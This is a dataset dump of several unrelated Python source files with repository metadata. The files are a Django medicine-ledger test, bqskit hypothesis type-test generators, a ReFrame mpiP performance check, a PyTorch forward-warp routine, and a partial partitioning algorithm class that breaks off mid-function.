"MIT"
] | null | null | null | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | 81 | 2022-03-04T23:46:02.000Z | 2022-03-19T13:06:46.000Z | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | null | null | null | from body.tests.login_test_case import LoginTestCase
from body.tests.model_helpers import create_ledger_entry, create_medicine
from freezegun import freeze_time
from django.utils.timezone import make_aware, datetime
@freeze_time(make_aware(datetime(2022, 3, 1)))
class MedicineTests(LoginTestCase):
def test_ledger_recalculates(self):
"""
Recalculating the current balance of a medicine correctly uses ledger entries to do so.
"""
medicine = create_medicine(self.user)
create_ledger_entry(medicine, 4)
create_ledger_entry(medicine, -1)
medicine.recalculate_balance_from_ledger()
self.assertEqual(medicine.current_balance, 3)
| 38.611111 | 95 | 0.755396 | 429 | 0.617266 | 0 | 0 | 476 | 0.684892 | 0 | 0 | 111 | 0.159712 |
33a790e4cc50cc09ac9352f7aad0bd45b97fcd11 | 84 | py | Python | src/apps/users/forms/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 27 | 2020-05-03T11:01:27.000Z | 2022-03-17T05:33:10.000Z | src/apps/users/forms/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 54 | 2020-05-09T01:18:41.000Z | 2022-01-22T10:31:15.000Z | src/apps/users/forms/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 9 | 2020-09-29T11:31:32.000Z | 2022-03-09T01:37:50.000Z | from .user_change import UserChangeForm
from .user_creation import UserCreationForm
| 28 | 43 | 0.880952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33a9396a5c748b360eebc18de6c808b8faa43521 | 20,818 | py | Python | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 13 | 2021-05-26T21:32:26.000Z | 2022-03-15T17:48:10.000Z | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 20 | 2021-05-26T20:17:15.000Z | 2022-02-27T20:04:10.000Z | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 2 | 2021-10-05T16:00:47.000Z | 2021-10-08T01:30:06.000Z | """This module contains functions to generate strategies from annotations."""
from __future__ import annotations
import collections
import inspect
import sys
from itertools import chain
from itertools import combinations
from typing import Any
from typing import Callable
from typing import Iterable
from typing import Sequence
import numpy as np
import pytest
from hypothesis import given
from hypothesis.extra.numpy import complex_number_dtypes
from hypothesis.extra.numpy import floating_dtypes
from hypothesis.extra.numpy import from_dtype
from hypothesis.strategies import booleans
from hypothesis.strategies import complex_numbers
from hypothesis.strategies import data
from hypothesis.strategies import dictionaries
from hypothesis.strategies import floats
from hypothesis.strategies import integers
from hypothesis.strategies import iterables
from hypothesis.strategies import just
from hypothesis.strategies import lists
from hypothesis.strategies import one_of
from hypothesis.strategies import SearchStrategy
from hypothesis.strategies import sets
from hypothesis.strategies import text
from hypothesis.strategies import tuples
from bqskit.utils.test.strategies import circuit_location_likes
from bqskit.utils.test.strategies import circuit_locations
from bqskit.utils.test.strategies import circuit_points
from bqskit.utils.test.strategies import circuit_regions
from bqskit.utils.test.strategies import circuits
from bqskit.utils.test.strategies import cycle_intervals
from bqskit.utils.test.strategies import everything_except
from bqskit.utils.test.strategies import gates
from bqskit.utils.test.strategies import operations
from bqskit.utils.test.strategies import unitaries
from bqskit.utils.test.strategies import unitary_likes
def _powerset(iterable: Iterable[Any]) -> Iterable[Any]:
"""
Calculate the powerset of an iterable.
Examples:
>>> list(powerset([1,2,3]))
... [() (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)]
References:
https://stackoverflow.com/questions/18035595/powersets-in-python-using-
itertools.
"""
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)))
def _split_generic_arguments(args: str) -> list[str]:
"""Split a generic's type arguments up."""
comma_indices = []
num_open_brackets = 0
for i, char in enumerate(args):
if char == '[':
num_open_brackets += 1
elif char == ']':
num_open_brackets -= 1
elif char == ',' and num_open_brackets == 0:
comma_indices.append(i)
if len(comma_indices) == 0:
return [args]
to_return: list[str] = []
last_index = 0
for comma_index in comma_indices:
to_return.append(args[last_index: comma_index])
last_index = comma_index + 1
to_return.append(args[last_index:])
return to_return
def type_annotation_to_valid_strategy(annotation: str) -> SearchStrategy[Any]:
"""Convert a type annotation into a hypothesis strategy."""
strategies: list[SearchStrategy[Any]] = []
annotation = annotation.replace('RealVector', 'Sequence[float]')
for type_str in annotation.split('|'):
type_str = type_str.strip()
if type_str == 'None':
strategies.append(just(None))
elif type_str == 'int':
strategies.append(integers())
elif type_str == 'float':
strategies.append(floats())
strategies.append(floating_dtypes().flatmap(from_dtype))
elif type_str == 'complex':
strategies.append(complex_numbers())
strategies.append(complex_number_dtypes().flatmap(from_dtype))
elif type_str == 'bool':
strategies.append(booleans())
elif type_str == 'str':
strategies.append(text())
elif type_str == 'Any':
strategies.append(just(None))
elif type_str.lower().startswith('tuple'):
inner_strategies = []
for arg in _split_generic_arguments(type_str[6:-1]):
inner_strategies.append(type_annotation_to_valid_strategy(arg))
strategies.append(tuples(*inner_strategies))
elif type_str.lower().startswith('dict'):
args = _split_generic_arguments(type_str[5:-1])
key_strat = type_annotation_to_valid_strategy(args[0])
val_strat = type_annotation_to_valid_strategy(args[1])
strategies.append(dictionaries(key_strat, val_strat))
elif type_str.lower().startswith('mapping'):
args = _split_generic_arguments(type_str[8:-1])
key_strat = type_annotation_to_valid_strategy(args[0])
val_strat = type_annotation_to_valid_strategy(args[1])
strategies.append(dictionaries(key_strat, val_strat))
elif type_str.lower().startswith('list'):
arg_strat = type_annotation_to_valid_strategy(type_str[5:-1])
strategies.append(lists(arg_strat))
elif type_str.lower().startswith('set'):
arg_strat = type_annotation_to_valid_strategy(type_str[4:-1])
strategies.append(sets(arg_strat))
elif type_str.lower().startswith('sequence'):
arg_strat = type_annotation_to_valid_strategy(type_str[9:-1])
strategies.append(lists(arg_strat))
elif type_str.lower().startswith('iterable'):
arg_strat = type_annotation_to_valid_strategy(type_str[9:-1])
strategies.append(iterables(arg_strat))
elif type_str.lower().startswith('intervallike'):
strat = type_annotation_to_valid_strategy('Tuple[int, int]')
strategies.append(strat)
strategies.append(cycle_intervals())
elif type_str.lower().startswith('cycleinterval'):
strategies.append(cycle_intervals())
elif type_str.lower().startswith('circuitpointlike'):
strat = type_annotation_to_valid_strategy('Tuple[int, int]')
strategies.append(strat)
strategies.append(circuit_points())
elif type_str.lower().startswith('circuitpoint'):
strategies.append(circuit_points())
elif type_str.lower().startswith('circuitregionlike'):
strat = type_annotation_to_valid_strategy('dict[int, IntervalLike]')
strategies.append(strat)
strategies.append(circuit_regions())
elif type_str.lower().startswith('circuitregion'):
strategies.append(circuit_regions())
elif type_str.lower().startswith('unitarylike'):
strategies.append(unitary_likes())
elif type_str.lower().startswith('unitarymatrix'):
strategies.append(unitaries())
elif type_str.lower().startswith('gate'):
strategies.append(gates())
elif type_str.lower().startswith('operation'):
strategies.append(operations())
elif type_str.lower().startswith('circuitlocationlike'):
strategies.append(circuit_locations())
elif type_str.lower().startswith('circuitlocation'):
strategies.append(circuit_location_likes())
elif type_str.lower().startswith('circuit'):
strategies.append(circuits(max_gates=1))
else:
raise ValueError(f'Cannot generate strategy for type: {type_str}')
return one_of(strategies)
def type_annotation_to_invalid_strategy(annotation: str) -> SearchStrategy[Any]:
"""Convert a type annotation into an invalid hypothesis strategy."""
strategies: list[SearchStrategy[Any]] = []
types_to_avoid: set[type] = set()
tuple_valids: dict[int, set[SearchStrategy[Any]]] = {}
tuple_invalids: dict[int, set[SearchStrategy[Any]]] = {}
dict_key_valids: set[SearchStrategy[Any]] = set()
dict_key_invalids: set[SearchStrategy[Any]] = set()
dict_val_valids: set[SearchStrategy[Any]] = set()
dict_val_invalids: set[SearchStrategy[Any]] = set()
list_invalids: set[SearchStrategy[Any]] = set()
set_invalids: set[SearchStrategy[Any]] = set()
iterable_invalids: set[SearchStrategy[Any]] = set()
annotation = annotation.replace('RealVector', 'Sequence[float]')
for type_str in annotation.split('|'):
type_str = type_str.strip()
if type_str == 'None':
types_to_avoid.add(type(None))
elif type_str == 'int':
types_to_avoid.add(int)
types_to_avoid.add(np.byte)
types_to_avoid.add(np.short)
types_to_avoid.add(np.intc)
types_to_avoid.add(np.longlong)
types_to_avoid.add(np.int8)
types_to_avoid.add(np.int16)
types_to_avoid.add(np.int32)
types_to_avoid.add(np.int64)
elif type_str == 'float':
types_to_avoid.add(float)
types_to_avoid.add(np.half)
types_to_avoid.add(np.single)
types_to_avoid.add(np.double)
types_to_avoid.add(np.longdouble)
types_to_avoid.add(np.float32)
types_to_avoid.add(np.float64)
elif type_str == 'complex':
types_to_avoid.add(complex)
types_to_avoid.add(np.csingle)
types_to_avoid.add(np.cdouble)
types_to_avoid.add(np.clongdouble)
types_to_avoid.add(np.complex64)
types_to_avoid.add(np.complex128)
elif type_str == 'bool':
types_to_avoid.add(bool)
types_to_avoid.add(np.bool_)
elif type_str == 'str':
types_to_avoid.add(str)
elif type_str == 'Any':
continue
elif type_str.lower().startswith('tuple'):
args = _split_generic_arguments(type_str[6:-1])
if len(args) not in tuple_valids:
tuple_valids[len(args)] = set()
tuple_invalids[len(args)] = set()
for arg in args:
valid_strat = type_annotation_to_valid_strategy(arg)
invalid_strat = type_annotation_to_invalid_strategy(arg)
tuple_valids[len(args)].add(valid_strat)
tuple_invalids[len(args)].add(invalid_strat)
types_to_avoid.add(tuple)
elif type_str.lower().startswith('dict'):
args = _split_generic_arguments(type_str[5:-1])
dict_key_valids.add(type_annotation_to_valid_strategy(args[0]))
dict_key_invalids.add(type_annotation_to_valid_strategy(args[1]))
dict_val_valids.add(type_annotation_to_invalid_strategy(args[0]))
dict_val_invalids.add(type_annotation_to_invalid_strategy(args[1]))
types_to_avoid.add(dict)
types_to_avoid.add(map)
elif type_str.lower().startswith('mapping'):
args = _split_generic_arguments(type_str[8:-1])
dict_key_valids.add(type_annotation_to_valid_strategy(args[0]))
dict_key_invalids.add(type_annotation_to_valid_strategy(args[1]))
dict_val_valids.add(type_annotation_to_invalid_strategy(args[0]))
dict_val_invalids.add(type_annotation_to_invalid_strategy(args[1]))
types_to_avoid.add(dict)
types_to_avoid.add(map)
elif type_str.lower().startswith('list'):
arg_strat = type_annotation_to_invalid_strategy(type_str[5:-1])
list_invalids.add(arg_strat)
types_to_avoid.add(list)
elif type_str.lower().startswith('set'):
arg_strat = type_annotation_to_invalid_strategy(type_str[4:-1])
set_invalids.add(arg_strat)
types_to_avoid.add(set)
types_to_avoid.add(collections.abc.MutableSet)
elif type_str.lower().startswith('sequence'):
arg_strat = type_annotation_to_invalid_strategy(type_str[9:-1])
list_invalids.add(arg_strat)
types_to_avoid.add(Sequence)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(bytearray)
types_to_avoid.add(bytes)
elif type_str.lower().startswith('iterable'):
arg_strat = type_annotation_to_invalid_strategy(type_str[9:-1])
iterable_invalids.add(arg_strat)
types_to_avoid.add(Sequence)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(Iterable)
types_to_avoid.add(set)
types_to_avoid.add(frozenset)
types_to_avoid.add(dict)
types_to_avoid.add(str)
types_to_avoid.add(bytearray)
types_to_avoid.add(bytes)
types_to_avoid.add(collections.abc.MutableSet)
types_to_avoid.add(enumerate)
types_to_avoid.add(map)
types_to_avoid.add(range)
types_to_avoid.add(reversed)
elif type_str.lower().startswith('intervallike'):
types_to_avoid.add(tuple)
elif type_str.lower().startswith('cycleinterval'):
continue
elif type_str.lower().startswith('circuitpointlike'):
types_to_avoid.add(tuple)
elif type_str.lower().startswith('circuitpoint'):
continue
elif type_str.lower().startswith('circuitregionlike'):
types_to_avoid.add(dict)
elif type_str.lower().startswith('circuitregion'):
continue
elif type_str.lower().startswith('circuitlocationlike'):
types_to_avoid.add(int)
types_to_avoid.add(Sequence)
types_to_avoid.add(Iterable)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(collections.abc.MutableSet)
types_to_avoid.add(enumerate)
types_to_avoid.add(range)
types_to_avoid.add(reversed)
elif type_str.lower().startswith('circuitlocation'):
continue
elif type_str.lower().startswith('unitarylike'):
types_to_avoid.add(np.ndarray)
elif type_str.lower().startswith('unitarymatrix'):
continue
elif type_str.lower().startswith('gate'):
continue
elif type_str.lower().startswith('operation'):
continue
elif type_str.lower().startswith('circuit'):
continue
else:
raise ValueError(f'Cannot generate strategy for type: {type_str}')
strategies.append(everything_except(tuple(types_to_avoid)))
for tuple_len in tuple_valids:
for valid_set in _powerset(list(range(tuple_len))): # (), (0,), (1,)
strategy_builder = []
for i in range(tuple_len):
if i in valid_set:
strat = one_of(list(tuple_valids[tuple_len]))
strategy_builder.append(strat)
else:
strat = one_of(list(tuple_invalids[tuple_len]))
strategy_builder.append(strat)
strategies.append(tuples(*strategy_builder))
if len(dict_val_invalids) > 0:
strategies.append(
dictionaries(
one_of(list(dict_key_valids)),
one_of(list(dict_val_invalids)),
min_size=1,
),
)
strategies.append(
dictionaries(
one_of(list(dict_key_invalids)),
one_of(list(dict_val_valids)),
min_size=1,
),
)
strategies.append(
dictionaries(
one_of(list(dict_key_invalids)),
one_of(list(dict_val_invalids)),
min_size=1,
),
)
if len(list_invalids) > 0:
strategies.append(lists(one_of(list(list_invalids)), min_size=1))
if len(set_invalids) > 0:
strategies.append(sets(one_of(list(set_invalids)), min_size=1))
if len(iterable_invalids) > 0:
strategies.append(
iterables(
one_of(
list(iterable_invalids),
),
min_size=1,
),
)
return one_of(strategies)
def invalid_type_test(
func_to_test: Callable[..., Any],
other_allowed_errors: list[type] = [],
) -> Callable[..., Callable[..., None]]:
"""
Decorator to generate invalid type tests.
A valid type test ensures that a function called with incorrect types
does raise a TypeError.
Examples:
>>> class Foo:
... def foo(self, x: int, y: int) -> None:
... if not is_integer(x):
... raise TypeError("")
... if not is_integer(y):
... raise TypeError("")
>>> class TestFoo:
... @invalid_type_test(Foo().foo)
... def test_foo_invalid_type(self) -> None:
... pass
>>> @invalid_type_test(Foo().foo)
... def test_foo_invalid_type(self) -> None:
... pass
"""
if sys.version_info[0] == 3 and sys.version_info[1] < 9:
return lambda x: x
valids = []
invalids = []
for id, param in inspect.signature(func_to_test).parameters.items():
if param.annotation == inspect._empty: # type: ignore
raise ValueError(
'Need type annotation to generate invalid type tests.',
)
valids.append(type_annotation_to_valid_strategy(param.annotation))
invalids.append(type_annotation_to_invalid_strategy(param.annotation))
strategies = []
for valid_set in _powerset(list(range(len(valids)))):
strategy_builder = []
for i in range(len(valids)):
if i in valid_set:
strategy_builder.append(valids[i])
else:
strategy_builder.append(invalids[i])
strategies.append(tuples(*strategy_builder))
def inner(f: Callable[..., Any]) -> Callable[..., None]:
if 'self' in inspect.signature(f).parameters:
@pytest.mark.parametrize('strategy', strategies)
@given(data=data())
def invalid_type_test(self: Any, strategy: Any, data: Any) -> None:
args = data.draw(strategy)
with pytest.raises((TypeError,) + tuple(other_allowed_errors)):
func_to_test(*args)
return invalid_type_test
else:
@pytest.mark.parametrize('strategy', strategies)
@given(data=data())
def invalid_type_test(strategy: Any, data: Any) -> None:
args = data.draw(strategy)
with pytest.raises((TypeError,) + tuple(other_allowed_errors)):
func_to_test(*args)
return invalid_type_test
return inner
def valid_type_test(
func_to_test: Callable[..., Any],
) -> Callable[..., Callable[..., None]]:
"""
Decorator to generate valid type tests.
A valid type test ensures that a function called with correct types
does not raise a TypeError.
Examples:
>>> class Foo:
... def foo(self, x: int, y: int) -> None:
... if not is_integer(x):
... raise TypeError("")
... if not is_integer(y):
... raise TypeError("")
>>> class TestFoo:
... @valid_type_test(Foo().foo)
... def test_foo_valid_type(self) -> None:
... pass
>>> @valid_type_test(Foo().foo)
... def test_foo_valid_type(self) -> None:
... pass
"""
if sys.version_info[0] == 3 and sys.version_info[1] < 9:
return lambda x: x
strategies = []
for id, param in inspect.signature(func_to_test).parameters.items():
if param.annotation == inspect._empty: # type: ignore
raise ValueError(
'Need type annotation to generate invalid type tests.',
)
strategies.append(type_annotation_to_valid_strategy(param.annotation))
strategy = tuples(*strategies)
def inner(f: Callable[..., Any]) -> Callable[..., None]:
if 'self' in inspect.signature(f).parameters:
@given(data=strategy)
def valid_type_test(self: Any, data: Any) -> None:
try:
func_to_test(*data)
except TypeError:
assert False, 'Valid types caused TypeError.'
except Exception:
pass
return valid_type_test
else:
@given(data=strategy)
def valid_type_test(data: Any) -> None:
try:
func_to_test(*data)
except TypeError:
assert False, 'Valid types caused TypeError.'
except Exception:
pass
return valid_type_test
return inner
| 35.893103 | 80 | 0.619944 | 0 | 0 | 0 | 0 | 1,232 | 0.05918 | 0 | 0 | 2,955 | 0.141944 |
33a977da8d2c47f04abb08e18a45125c2af8f923 | 3,600 | py | Python | reframechecks/mpip/mpip.py | reframe-hpc/hpctools | ad3efe478334fabb7f64aa3d1566c88e4c488aaf | [
"BSD-3-Clause"
] | 3 | 2020-02-18T12:48:08.000Z | 2021-02-06T01:43:30.000Z | reframechecks/mpip/mpip.py | reframe-hpc/hpctools | ad3efe478334fabb7f64aa3d1566c88e4c488aaf | [
"BSD-3-Clause"
] | 5 | 2020-03-28T11:59:57.000Z | 2020-08-28T08:46:02.000Z | reframechecks/mpip/mpip.py | reframe-hpc/hpctools | ad3efe478334fabb7f64aa3d1566c88e4c488aaf | [
"BSD-3-Clause"
] | 3 | 2020-03-17T16:10:56.000Z | 2020-07-10T06:24:34.000Z | # Copyright 2019-2021 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# HPCTools Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import os
import sys
import reframe as rfm
import reframe.utility.sanity as sn
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),
'../common'))) # noqa: E402
import sphexa.hooks as hooks
import sphexa.sanity as sphs
import sphexa.sanity_mpip as sphsmpip
# {{{ class SphExa_mpiP_Check
@rfm.simple_test
class SphExa_mpiP_Check(rfm.RegressionTest, hooks.setup_pe,
hooks.setup_code):
# {{{
'''
This class runs the test code with mpiP (mpi+openmp):
http://llnl.github.io/mpiP
'''
# }}}
steps = parameter([4])
compute_node = parameter([2])
# compute_node = parameter([100, 200, 300, 400, 500])
np_per_c = parameter([1e4])
mpip_flags = variable(bool, value=True)
def __init__(self):
# {{{ pe
self.descr = 'Tool validation'
self.valid_prog_environs = ['*']
self.valid_systems = ['*']
self.modules = ['mpiP']
self.maintainers = ['JG']
self.tags = {'sph', 'hpctools', 'cpu'}
# }}}
# {{{ compile
self.testname = 'sedov'
self.tool = 'pprof'
self.which_rpt = 'which.rpt'
self.prebuild_cmds = [
# f'which {self.tool} &> {self.which_rpt}',
# f'which $EBROOTPPROF/bin/{self.tool} >> {self.which_rpt}',
]
# }}}
# {{{ run
# self.variables = {'MPIP': '"-c"',}
# -c: concise version of report
# -d: suppress callsite details
# -p: report histogram of point-to-point MPI calls
# -y: report histogram of collective MPI calls
#
# libpath = '$EBROOTMPIP/lib'
# self.variables['LD_LIBRARY_PATH'] = f'{libpath}:$LD_LIBRARY_PATH'
self.rpt_file = 'mpip.rpt'
self.postrun_cmds += [
f'# -------------------------------------------------------------',
f'# -------------------------------------------------------------',
]
# }}}
# {{{ sanity
self.sanity_patterns = sn.all([
# check the job output:
sn.assert_found(r'Total time for iteration\(0\)', self.stdout),
# check the tool report:
sn.assert_found('^mpiP: Storing mpiP output in ', self.stdout),
])
# }}}
# {{{ hooks
@rfm.run_before('performance')
def set_tool_perf_patterns(self):
self.perf_patterns.update({
'mpip_avg_mpi_time': sphsmpip.mpip_perf_patterns(self, 1),
'mpip_avg_app_time': sphsmpip.mpip_perf_patterns(self, 2),
'%mpip_avg_mpi_time_max': sphsmpip.mpip_perf_patterns(self, 5),
'%mpip_avg_mpi_time': sphsmpip.mpip_perf_patterns(self, 3),
'%mpip_avg_mpi_time_min': sphsmpip.mpip_perf_patterns(self, 6),
'%mpip_avg_non_mpi_time': sphsmpip.mpip_perf_patterns(self, 4),
})
@rfm.run_before('performance')
def set_tool_perf_reference(self):
myzero_s = (0, None, None, 's')
myzero_p = (0, None, None, '%')
self.reference['*:mpip_avg_mpi_time'] = myzero_s
self.reference['*:mpip_avg_app_time'] = myzero_s
self.reference['*:%mpip_avg_mpi_time_max'] = myzero_p
self.reference['*:%mpip_avg_mpi_time'] = myzero_p
self.reference['*:%mpip_avg_mpi_time_min'] = myzero_p
self.reference['*:%mpip_avg_non_mpi_time'] = myzero_p
# }}}
# }}}
| 34.951456 | 79 | 0.570833 | 3,056 | 0.848889 | 0 | 0 | 3,073 | 0.853611 | 0 | 0 | 1,517 | 0.421389 |
33a9e48d845125b9644014be228bb6ef28ca1951 | 4,743 | py | Python | Forward_Warp/python/forward_warp_python.py | hologerry/Forward-Warp | 82a32a372383b3c69f9666cb5b8189dbfb05d328 | [
"MIT"
] | 81 | 2019-07-04T20:51:34.000Z | 2022-03-26T15:58:42.000Z | Forward_Warp/python/forward_warp_python.py | wbhu/Forward-Warp | 90e7e32f2c0e666ffc029b7b274b30b3a45cd3ce | [
"MIT"
] | 9 | 2020-05-04T04:59:16.000Z | 2021-12-21T19:06:31.000Z | Forward_Warp/python/forward_warp_python.py | wbhu/Forward-Warp | 90e7e32f2c0e666ffc029b7b274b30b3a45cd3ce | [
"MIT"
] | 9 | 2019-09-04T02:09:12.000Z | 2021-11-27T09:31:49.000Z | import torch
from torch.nn import Module, Parameter
from torch.autograd import Function
class Forward_Warp_Python:
@staticmethod
def forward(im0, flow, interpolation_mode):
im1 = torch.zeros_like(im0)
B = im0.shape[0]
H = im0.shape[2]
W = im0.shape[3]
if interpolation_mode == 0:
for b in range(B):
for h in range(H):
for w in range(W):
x = w + flow[b, h, w, 0]
y = h + flow[b, h, w, 1]
nw = (int(torch.floor(x)), int(torch.floor(y)))
ne = (nw[0]+1, nw[1])
sw = (nw[0], nw[1]+1)
se = (nw[0]+1, nw[1]+1)
p = im0[b, :, h, w]
if nw[0] >= 0 and se[0] < W and nw[1] >= 0 and se[1] < H:
nw_k = (se[0]-x)*(se[1]-y)
ne_k = (x-sw[0])*(sw[1]-y)
sw_k = (ne[0]-x)*(y-ne[1])
se_k = (x-nw[0])*(y-nw[1])
im1[b, :, nw[1], nw[0]] += nw_k*p
im1[b, :, ne[1], ne[0]] += ne_k*p
im1[b, :, sw[1], sw[0]] += sw_k*p
im1[b, :, se[1], se[0]] += se_k*p
else:
round_flow = torch.round(flow)
for b in range(B):
for h in range(H):
for w in range(W):
x = w + int(round_flow[b, h, w, 0])
y = h + int(round_flow[b, h, w, 1])
if x >= 0 and x < W and y >= 0 and y < H:
im1[b, :, y, x] = im0[b, :, h, w]
return im1
@staticmethod
def backward(grad_output, im0, flow, interpolation_mode):
B = grad_output.shape[0]
C = grad_output.shape[1]
H = grad_output.shape[2]
W = grad_output.shape[3]
im0_grad = torch.zeros_like(grad_output)
flow_grad = torch.empty([B, H, W, 2])
if interpolation_mode == 0:
for b in range(B):
for h in range(H):
for w in range(W):
x = w + flow[b, h, w, 0]
y = h + flow[b, h, w, 1]
x_f = int(torch.floor(x))
y_f = int(torch.floor(y))
x_c = x_f+1
y_c = y_f+1
nw = (x_f, y_f)
ne = (x_c, y_f)
sw = (x_f, y_c)
se = (x_c, y_c)
p = im0[b, :, h, w]
if nw[0] >= 0 and se[0] < W and nw[1] >= 0 and se[1] < H:
nw_k = (se[0]-x)*(se[1]-y)
ne_k = (x-sw[0])*(sw[1]-y)
sw_k = (ne[0]-x)*(y-ne[1])
se_k = (x-nw[0])*(y-nw[1])
nw_grad = grad_output[b, :, nw[1], nw[0]]
ne_grad = grad_output[b, :, ne[1], ne[0]]
sw_grad = grad_output[b, :, sw[1], sw[0]]
se_grad = grad_output[b, :, se[1], se[0]]
im0_grad[b, :, h, w] += nw_k*nw_grad
im0_grad[b, :, h, w] += ne_k*ne_grad
im0_grad[b, :, h, w] += sw_k*sw_grad
im0_grad[b, :, h, w] += se_k*se_grad
flow_grad_x = torch.zeros(C)
flow_grad_y = torch.zeros(C)
flow_grad_x -= (y_c-y)*p*nw_grad
flow_grad_y -= (x_c-x)*p*nw_grad
flow_grad_x += (y_c-y)*p*ne_grad
flow_grad_y -= (x-x_f)*p*ne_grad
flow_grad_x -= (y-y_f)*p*sw_grad
flow_grad_y += (x_c-x)*p*sw_grad
flow_grad_x += (y-y_f)*p*se_grad
flow_grad_y += (x-x_f)*p*se_grad
flow_grad[b, h, w, 0] = torch.sum(flow_grad_x)
flow_grad[b, h, w, 1] = torch.sum(flow_grad_y)
else:
round_flow = torch.round(flow)
for b in range(B):
for h in range(H):
for w in range(W):
x = w + int(round_flow[b, h, w, 0])
y = h + int(round_flow[b, h, w, 1])
if x >= 0 and x < W and y >= 0 and y < H:
im0_grad[b, :, h, w] = grad_output[b, :, y, x]
return im0_grad, flow_grad
| 46.5 | 81 | 0.356525 | 4,652 | 0.980814 | 0 | 0 | 4,615 | 0.973013 | 0 | 0 | 0 | 0 |
33aa02868cbd8dfb15a12fdd973d56d5d7e99fb1 | 10,890 | py | Python | slingen/src/algogen/Algorithm.py | danielesgit/slingen | e7cfee7f6f2347b57eb61a077746c9309a85411c | [
"BSD-3-Clause"
] | 23 | 2018-03-13T07:52:26.000Z | 2022-03-24T02:32:00.000Z | SRC/Algorithm.py | dfabregat/Cl1ck | d9ae627f0616dc23b1f98ff41ce94f43926bb2b0 | [
"BSD-3-Clause"
] | 2 | 2018-09-28T18:29:25.000Z | 2019-02-20T13:22:19.000Z | SRC/Algorithm.py | dfabregat/Cl1ck | d9ae627f0616dc23b1f98ff41ce94f43926bb2b0 | [
"BSD-3-Clause"
] | 3 | 2018-06-13T13:51:57.000Z | 2020-01-11T14:47:02.000Z | import itertools
import Partitioning
class Algorithm( object ):
def __init__( self, linv, variant, init, repart, contwith, before, after, updates ):
self.linv = linv
self.variant = variant
if init:
#assert( len(init) == 1 )
self.init = init[0]
else:
self.init = None
self.repart = repart
self.contwith = contwith
self.before = before
self.after = after
self.updates = updates
# To be filled up for code generation
self.name = None
self.partition = None
self.partition_size = None
self.guard = None
self.repartition = None
self.repartition_size = None
self.basic_repart = None
self.cont_with = None
def prepare_for_code_generation( self ):
self.set_name()
self.set_partition()
self.set_partition_size()
self.set_guard()
self.set_repartition()
self.set_repartition_size()
self.set_basic_repart()
self.set_cont_with()
def set_name( self ):
self.name = "%s_blk_var%d" % (self.linv.operation.name, self.variant)
def set_partition( self ):
self.partition = dict()
traversals = self.linv.traversals[0][0]
#for op in self.linv.operation.operands: # [FIX] linv_operands?
for op in self.linv.linv_operands: # [FIX] linv_operands?
#part_size = self.linv.pme.part_shape[ op.get_name() ]
part_size = self.linv.linv_operands_part_shape[ op.get_name() ]
#part_flat = list(itertools.chain( *self.linv.pme.partitionings[ op.get_name() ] ))
part_flat = list(itertools.chain( *self.linv.linv_operands_basic_part[ op.get_name() ] ))
trav = traversals[op.get_name()]
if part_size == (1, 1):
continue
elif part_size == (1, 2):
if trav == (0, 1):
part_quad = "L"
else: # (0, -1)
part_quad = "R"
elif part_size == (2, 1):
if trav == (1, 0):
part_quad = "T"
else: # (-1, 0)
part_quad = "B"
elif part_size == (2, 2):
if trav == (1, 1):
part_quad = "TL"
elif trav == (1, -1):
part_quad = "TR"
elif trav == (-1, 1):
part_quad = "BL"
else: #(-1, -1):
part_quad = "BR"
else:
raise Exception
self.partition[ op.get_name() ] = (part_size, part_flat, part_quad)
def set_partition_size( self ):
self.partition_size = dict()
traversals = self.linv.traversals[0][0]
#for op in self.linv.operation.operands:
for op in self.linv.linv_operands:
name = op.get_name()
traversal = traversals[op.get_name()]
if traversal == (0, 0):
continue
elif traversal in ( (0, 1), (0, -1) ): # L|R (the specific quadrant can be retrieved from self.partition)
self.partition_size[ name ] = ( op.size[0], 0 )
elif traversal in ( (1, 0), (-1, 0) ): # T/B
self.partition_size[ name ] = ( 0, op.size[1] )
elif traversal in ( (1, 1), (1, -1), (-1, 1), (-1, -1) ): # 2x2
self.partition_size[ name ] = ( 0, 0 )
else:
print( name, traversal )
raise Exception
def set_guard( self ):
self.guard = []
traversals = self.linv.traversals[0][0]
#guard_dims = [bd[0] for bd in self.linv.linv_bound_dimensions[1:]]
guard_dims = []
#for bd in self.linv.linv_bound_dimensions[1:]:
for bd in self.linv.operation.bound_dimensions[1:]:
for d in bd:
op_name, dim = d.split("_")
op = [ o for o in self.linv.operation.operands if o.name == op_name ][0]
if op.st_info[1] != op:
continue
if dim == "r":
idx = 0
else:
idx = 1
if ( traversals[op_name][idx] == 0 ):
continue
self.guard.append( (op.get_size()[idx], guard(op, traversals[op_name])) )
break
def set_repartition( self ):
self.repartition = dict()
traversals = self.linv.traversals[0][0]
#for op in self.linv.operation.operands:
for op in self.linv.linv_operands:
part_size = self.linv.linv_operands_part_shape[ op.get_name() ]
#part_size = self.linv.pme.part_shape[ op.get_name() ]
repart = self.repart[ op.get_name() ]
traversal = traversals[op.get_name()]
if part_size == (1, 1):
continue
elif part_size == (1, 2):
repart_size = (1, 3)
if traversal == (0, 1): # ( 0 || 1 | 2 )
repart_quadrant = "R"
else: # ( 0 | 1 || 2 )
